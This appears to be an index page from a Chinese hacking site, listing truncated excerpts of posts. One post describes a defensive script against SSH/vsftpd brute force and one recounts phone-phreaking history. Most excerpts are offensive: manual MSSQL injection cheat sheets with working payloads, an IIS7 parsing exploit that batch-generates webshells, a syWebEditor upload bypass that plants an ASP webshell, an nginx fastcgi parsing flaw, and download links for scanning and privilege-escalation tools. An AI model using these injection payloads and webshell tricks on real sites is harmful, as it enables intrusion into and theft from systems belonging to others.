用SHELL脚本来防止SSH和vsftpd暴力破解
我的一台公网服务器,由于网站采取的是双备份策略,所以开放了vsftpd的21端口,近来发现许多人在尝试暴力破解vsftpd和ssh,我随便看了看/var/log/secure日志,显示如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29.110.104=168 202.78.173...
SQL 手工注入大全
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssq...
1970年左右发现最早黑客技术——哨子
1970年左右发现最早黑客技术——哨子 约翰·德雷珀(John Draper)是最早被冠以“黑客”称号的家伙。出生于1944年,圈内人更熟悉的名称是“Captain Crunch”、“Crunch ”、“Crunchman”和“Cap'n Crunch” ,电话飞客先驱人物。约翰·德雷珀出生于美国空军工程师家庭,1964年,父唱子随,也进入了空军。当时驻守在阿拉斯加,开始干起了电话飞客的工作,...
手工MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@ser...
星外目录扫描可写权限辅助工具
星外提权辅助工具提升提权成功率。原理是自动读所有可读的注册表, 并自动找注册表里面存在的路径信息,然后全部echo。结合阿D的那个 ASP目录扫描脚本效果更佳。 图2: 下载:finaly
顶级网站扫描工具WVS最新版下载
网站扫描工具,不需要安装。不像国内的那几个软件,扫描速度还可以。 遍历目录我喜欢哦。哈哈,蜘蛛厉害。有需要的就顶顶。上张图。 下载:WVS-1.24.121
iis7重大漏洞 自动批量生产webshell!~
Automatic iis7 parsing vulnerability exploit 我就不在多说什么了! 直接上图: 下载:Automatic iis7.0 exploit
sywebeditor上传漏洞的另外一种方法,绝对实用
https://www.webshell.cc/syWebEditor/...to&fileType=gif|jpg|png|&filePathType=1&filePath=/PhotoFile/ProFile/ 可以浏览目录的,下面有个上传文件,打开,上传一张jpg小马,然后重命名,1.asp。然后上传抓包, 保存txt,后面加个 空格 用winhex打开...
注入命令
_________________________________________________________________________ 【测试注入】 and 1=1 and 1=2 _________________________________________________________________________ 【猜表一般表的名称无非是:admin adminuser ...
nginx fastcgi配置失误+解析漏洞引发的漏洞
现在一定还有很多网站用的nginx,自从N个月以前的nginx解析漏洞以来,现在差不多都修复了,一般语句都是这么写的 if ( $fastcgi_script_name ~ ..*/.*php ) { return 403; } 当匹配*/*.php*的时候则返回403 但是有些fastcgi配置的却不只有.php,有些甚至配置了ph*,(网上有一篇文章就是这么写的) 这样.ph*就没法匹配.ph...